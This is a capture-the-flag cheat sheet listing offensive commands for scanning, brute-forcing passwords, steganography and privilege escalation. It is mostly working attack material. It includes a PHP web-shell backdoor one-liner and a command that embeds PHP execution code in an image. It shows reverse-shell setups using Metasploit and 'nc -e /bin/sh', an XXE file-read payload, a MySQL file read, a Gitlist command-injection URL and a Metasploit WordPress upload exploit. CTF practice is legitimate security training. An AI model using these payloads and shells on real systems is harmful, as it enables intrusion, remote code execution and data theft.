CTF -- CTF AWESOME

Steps to follow when participating to CTF

Collaborative markdown notes

See all opened ports, here

# All ports
nmap -p- 192.168.1.1
# This may detect more things, takes longer: Detects if ftp is vulnerable
nmap -A 192.168.1.1

nmap -sV -A 192.168.1.1

nmap -A -O -T4 --script=vuln 192.168.1.66
 

Connect to a specific port

nc -n 192.168.0.157 13337

More info about the website:

whatweb http://192.168.0.157:80

Output:
http://192.168.0.157:80 [200 OK] Apache[2.4.27], Country[RESERVED][ZZ], HTML5, HTTPServer[Fedora Linux][Apache/2.4.27 (Fedora)], IP[192.168.0.157], Title[Morty's Website]

Dirbuster

dirbuster

wordlist: /usr/share/dirbuster/wordlists

dirsearch

https://github.com/maurosoria/dirsearch

./dirsearch -u host -e html,php,txt,cfg

Scan website with nikto

nikto -h host [-port p]

Scan wordpress site:

wpscan --url host --enumerate vp

# --enumerate vp: vulnerable plugins

wpscan --url 192.168.56.223/bull/ -r --enumerate u --enumerate vp --enumerate t --enumerate tt

# --enumerate u e= enumerate users

Files in images here:

The terminating byte for a JPEG is FF D9 in hex

PK are the initials of Phil Katz, the inventor of the zip file

Image on image here

#!/bin/bash -ex

wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar
chmod +x stegsolve.jar
mkdir bin
mv stegsolve.jar bin/

# or to start it
java -jar Stegsolve.jar

Find strings in image:

strings image.jpg

Add php code in image

exiftool -Comment="<?php passthru($_GET’cmd’); _halt_compiler();" /root/picture.jpeg

Copy binary data from a file to another

dd count=38508 skip=100 if=sss.jpeg of=out.jpeg bs=1

# copy bytes starting with position 100(in decimal, 100th byte), copy 38508 bytes

Brute force passwords with HYDRA or wpscan

hydra -l elliot -P ~/fsocity.dic 10.0.2.4 http-post-form “/wp-login.php:log=elliot&pwd=^PASS^:ERROR”

Where:
    -l specifies the username
    -P specifies the dictionary file
    http-post-form is the authentication method being used

and,

“/wp-login.php:log=elliot&pwd=^PASS^:ERROR”

roughly parses to,

    /wp-login.php the login page to attack
    log=elliot is the username on the form
    pwd=^PASS^ substitutes the passwords from the dictionary file
    ERROR tells it what to look for if it fails

Bruteforce 8 Point

• Brute force ftp, ssh, mysql, postgreesql, etc....

WPscan

wpscan -u 10.0.2.4 --wordlist ~/fsocity.dic --username elliot --threads 50

Generate wordlist based on the content from a website

 cewl [ -m 6 ]-w passwords.txt http://derpnstink.local/weblog/
 
 # [ -m 6 ] Minimum size 6
 
 # You can pass the through john's rules, here's a tutorial: http://netsec.ws/?p=457
 john --wordlist=passwords.txt --rules --stdout > words-john.txt

Root escalation

sudo -

sudo -i

# Method 2
# once we obtain a terminal on the remote, we can run the linux-exploit-suggester.sh
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh && \
  bash linux-exploit-suggester.sh
# This will give us root escalation methods for the current distro (e.g. C programs which can be compiled)
#    [+] [CVE-2016-4557] double-fdput()
#    [+] [CVE-2016-5195] dirtycow
#    [+] [CVE-2016-5195] dirtycow 2

Check the services that are run by root

ps-aux | grep root

PHP

Shell one-line

https://gist.github.com/sente/4dbb2b7bdda2647ba80b

<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Using reverse shell with metasploit

Kali has some reverse shells for php: /usr/share/webshells/php, ex: php-reverse-shell.php

Change in that script the following lines:

$ip = '192.168.1.159';  // CHANGE THIS your IP, not VM ip
$port = 55555;       // CHANGE THIS your PORT(where the metasploit will listen)

Upload file to VM.

Open metasploit:

msfconsole

msf > use multi/handler
msf exploit(multi/handler) > set payload linux/x86/shell/reverse_tcp
# Output: payload => linux/x86/shell/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.159
# Output: LHOST => 192.168.1.159
msf exploit(multi/handler) > set LPORT 55555
# Output: LPORT => 55555
msf exploit(multi/handler) > exploit
#
$ whoami

Open the page containing the shell and start writing in the msfconsole linux commands: whoami.

Reverse shell with nc

# From your pc
nc -l -k -p port


# From victim's pc
nc -e /bin/sh your_ip port

Wordpress

Plugin SlideShow < 1.4.7

Exploit WordPress using SlideShow Gallery Authenticated File Upload

mfsconsole

use exploit/unix/webapp/wp_slideshowgallery_upload
set RHOST 192.168.1.74
set TARGETURI /weblog/
set WP_USER admin
set WP_PASSWORD admin
run

shell

PCAP

Get information from a pcap

ngrep -I capture.pcap

NC files

mcrypt -d the_wall.txt.nc

Substitution solver: https://www.guballa.de/substitution-solver

Just in case ROT doesn't work.

This

Sr Wrnrgir
Ru blf ziv ivzwrmt gsrh R nrtsg yv mlg zorev. R szev kozxv z yzxpwlli rm Yozxpnzipvg
dliphslk fmwvi /ptyyzxpwlli ulowvi blf nfhg szev gl fhv
KzhhKzhh.qkt rm liwvi gl tvg zxxvhh.

Decodes to this:

Hi Dimitri
If you are reading this I might be not alive. I have place a backdoor in Blackmarket
workshop under /kgbbackdoor folder you must have to use
PassPass.jpg in order to get access.

XXE injection

Here is more.

curl -d "@req.xml" -X POST -k https://172.25.1.130:15988/pool/process.php

# The file "@req.xml"  containing this:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///home/teo/server" >]>
<root>
  <name>sebi</name>
  <tel></tel>
  <email>&xxe;</email>
  <password></password>
</root>

Curl

Make a request with a different user agent

curl -A "Three-eyed-raven" -X GET http://192.168.1.191/raven.php

# -A user-agent

Run imap request: Documentation, link2

curl "imap://mail.7kingdoms.ctf/INBOX;UID=1" -v -k --user "olennatyrell@7kingdoms.ctf:H1gh.Gard3n.powah"

DNS server

nslookup
> server 192.168.1.191
Default server: 192.168.1.191
Address: 192.168.1.191#53
# Query type
> set type=TXT
## Query
> winterfell.7kingdoms.ctf
Server:         192.168.1.191
Address:        192.168.1.191#53
## Query
> timef0rconqu3rs.7kingdoms.ctf

# Or you can use dig

dig @192.168.1.191  -t TXT timef0rconqu3rs.7kingdoms.ctf
dig @dns_server [query type] query

# Get DNS of Ip
dig @192.168.200.1 -x 192.168.220.17

PosgreeSQL

psql -h 192.168.1.191 -U robinarryn -d mountainandthevale

## Show tables
> \d

# Show definition of view flag
> \d+ flag

Exploit Research

searchsploit [app]
searchsploit postgreesql

Cryptography

Common Modulus attack with extended Euclidean algorithm: here

Read file using mysql

# Create table
mysql kingslanding -h 192.168.56.101 -ucerseilannister -p_g0dsHaveNoMercy_ -e "create table Flag (flag varchar(500));"

# load informations from file to that table
mysql kingslanding -h 192.168.56.101 -ucerseilannister -p_g0dsHaveNoMercy_ -e "load data infile '/etc/mysql/flag' into table Flag;"

# You will get an error that will display the content of that file

Exploits

Gitlist - Source

http://localhost/gitlist/my_repo.git/blame/master/""`whoami`

WalkThroughs

• MrRobot
• Seatle Ctf
• Rickdiculouslyeasy

Challenges

• HackTheBox
• VulnHub
• SquareCTF
• Enigma
• Backdoor SDSLabs
• Ringzer0CTF
• Metsploitable

Helpful links

• CTFTime
• captf.com/practice-ctf
• wechall
• Reddit post